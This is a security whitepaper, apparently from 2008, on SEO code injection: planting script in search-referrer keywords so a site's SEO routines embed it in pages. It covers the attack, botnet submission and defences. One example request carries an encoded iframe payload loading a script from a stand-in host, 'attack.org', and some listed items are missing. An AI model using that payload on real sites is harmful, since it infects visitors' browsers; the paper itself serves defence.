|SEO Code Injection : Whitepapers : Home|
Search Engine Optimization Poisoning
Search Engine Optimization (SEO) is a critical component in an organizations ability to be discovered by prospective customers and clients as they conduct online searches for information and products. It is a technique commonly employed by the largest and most sophisticated Internet businesses, and a key component of their online business strategy.
Unfortunately the nature of the SEO algorithms, and the subsequent modification of dynamic site content that they promote, means that they can often be manipulated by an attacker. Vulnerable Web applications can be used to propagate infectious code capable of compromising the organizations prospective customers and clients. This brief paper explains the technique referred to as SEO Code Injection or Poisoning, and the steps that may be taken to detect and mitigate the vulnerability.
Unlike standard SEO manipulation, which focuses on manipulating the relative page-rank positioning of results within popular search engines, SEO Code Injection attacks are designed to fool a Web application’s backend systems in to embedding malicious code within dynamically created page content. In a successful attack, any subsequent request for the targeted page (or related pages on the same site) will result in the attacker’s malicious code being included as part of the page content, and the code likely executed within the remote users Web browser during the page rendering process.
While an attacker could attempt to embed almost any kind of malicious code through a vulnerable SEO vector, in most cases the preferred method is to include short code segments that will cause a visitors Web browser to link to, and execute, more advanced malicious code elements hosted on external Web servers under the attackers direct control.
How it Works
In essence, SEO Code Injection is a fairly simple attack that targets Web site visitors by abusing poor application logic and exploiting content sanitization flaws within the backend Web application service.
For an attack to be successful, the Web application must provide three functions:
While the specific formulation of the attack can take on various forms depending upon the nuances of the vulnerable Web application itself, the process of conducting an attack is typically straight forward. The description below provides an explanation of the most common vectors used in attacks conducted in the first half of 2008.
GET /target_page.php HTTP/1.0
Referer: http://www.google.com/search?hl=en&q= XSS+%3E%3Ciframe+src%3D%2F%2Fattack.org%2Fbad.js%3E
B. Distributed Submission. While it may be possible for a would-be attacker to repeatedly type their malicious keyword payloads in to the search engine, almost all SEO Code Injection attacks are conducted using automated tools. Once a HTTP request packet has been created, it can be repeatedly sent using any number of tools and scripts, or it may be farmed out to a botnet.
Some Web application SEO routines check for additional submission data for uniqueness of the page request (e.g. cookies, IP address, etc.) – but can be easily overcome using a small degree of additional automation and distributed botnets or proxies.
It is important to note that the vulnerability being exploited lies within the Web application server’s SEO routines, and not with the method in which victims navigated to an infected page. For example, a home user may search for the keywords “XSS Attack”, and end up following a link to a page initially infected by an attacker who used different keywords (e.g. “Gunter XSS”). The actual “legitimate” keywords are irrelevant to the attacker, only the malicious SEO Code Injection content matters.
To protect against SEO Code Injection attacks, organizations have a number of mitigation strategies they can adopt. While secure development and testing processes are critical, defense in depth through the use of content inspection and filtering technologies can help protect against coding failures and unexpected injection vectors.
A critical component to mitigating the threat of SEO Code Injection attacks is through the use of correct input sanitization. Ideally, any user-supplied content should be processed against a white-list of allowable characters prior to their use in search engine optimization or page creation routines. User-supplied data not inherently covered by the white-list should be automatically dropped. In particular, user-supplied HTML code characters (and their myriad of encoded forms) should never be embedded within page content unless specifically authorized, and its context fully understood by the application developer – even then, professional security advice should be sought. In almost all cases, non-ASCII alphanumeric characters should never be used in search optimization routines.
Since many SEO Code Injection attack attempts will likely be automated, application developers should consider the use of anti-automated tool mitigation strategies. These strategies could consist of temporal anomaly detection routines (e.g. flagging inconsistent bursts of network traffic), the use of submission source IP address information to identify uniqueness, and perhaps bad-IP lookups (e.g. are the source IP addresses known botnet agents, or located within heavily botnet saturated netblocks).
Given the nature and construction of the actual malicious content (e.g. iframe, script, URL, etc.), and its placement within the HTTP page request (e.g. HTTP REFERER, HTTP GET, etc.), many perimeter and Web application protection systems have the capability to identify the embedded malicious content.
Intrusion Prevention Systems (IPS) that can deep-inspect HTTP headers and identify cross-site scripting, SQL Injection and other HTML code injection string formulations, can stop this malicious inbound content from making its way to the Web application server – thereby protecting any vulnerable SEO routines from attack and subsequent manipulation.
Content filtering technologies (e.g. perimeter URL filtering) can often be used to identify the inclusion of URL’s previously known to host malicious content. When complimenting Web proxy technologies, they can prevent end-users from navigating to malicious links that happen to be embedded within an affected SEO Code Injection vulnerable Web site.
The processes necessary to uncover whether a Web application is vulnerable to SEO Code Injection is not a trivial task. As with all second-order code injection attack formats, the fact that testing for its presence cannot typically be done by sending a single request, and does not result in an immediately verifiable response, means that standard code injection testing methodologies may fail to detect vulnerable vectors.
Current generation code auditing suites can sometimes be used to perform a static analysis review Web application source code. Depending upon the language the application has been written in, and the level of access granted to the source code, some tools are capable of detecting probable SEO Code Injection flaws. Since the attack vector is relatively new, and the fact that SEO routines themselves are constantly evolving, static analysis code auditing tools for Web applications still have some way to mature and will probably require a high degree of manual tuning.
Many commercial Web application vulnerability scanners are capable of manipulating HTTP header fields and identifying places within a vulnerable application that incorrectly sanitize data. However, sophisticated SEO routines which require thresholds to be met before triggering page content modification will likely go undetected unless the application vulnerability scanner is specifically configured to repeat tests until they exceed the threshold.
Web application penetration testing methodologies need to encompass tests for identifying likely SEO Code Injection vulnerabilities and vectors. Ideally, testing should include:
2008 saw the birth of the threat now known as SEO Code injection or Poisoning. While SEO routines mature and adapt to changes in the Internet search page-ranking systems, organizations will continue to be exposed to new threats and attack vectors that exploit weaknesses in them.
Given the complexity in the way SEO routines function – in
particular the algorithms behind repetitive keyword ranking – the
process for detecting the presence of exploitable flaws in a Web
application is more involved, and newer methodologies are required
in order to detect SEO Code Injection vulnerabilities.
“Massive IFRAME SEO Poisoning Attack Continuing”, Dancho Danchev, http://ddanchev.blogspot.com/2008/03/massive-iframe-seo-poisoning-attack.html
“More High Profile Sites IFRAME Injected”, Dancho Danchev, http://ddanchev.blogspot.com/2008/03/more-high-profile-sites-iframe-injected.html
“URL Embedded Attacks”, Gunter Ollmann, http://www.technicalinfo.net/papers/URLEmbeddedAttacks.html
“HTML Code Injection and Cross-site Scripting”, Gunter Ollmann, http://www.technicalinfo.net/papers/CSS.html
“Second-order Code Injection”, Gunter Ollmann, http://www.technicalinfo.net/papers/SecondOrderCodeInjection.html
“Stopping Automated Attack Tools”, Gunter Ollmann, http://www.technicalinfo.net/papers/StoppingAutomatedAttackTools.html
“SEO Poisoning Attacks Growing”, Robert Lemos,
“A Second-order of XSS”, Gunter Ollmann,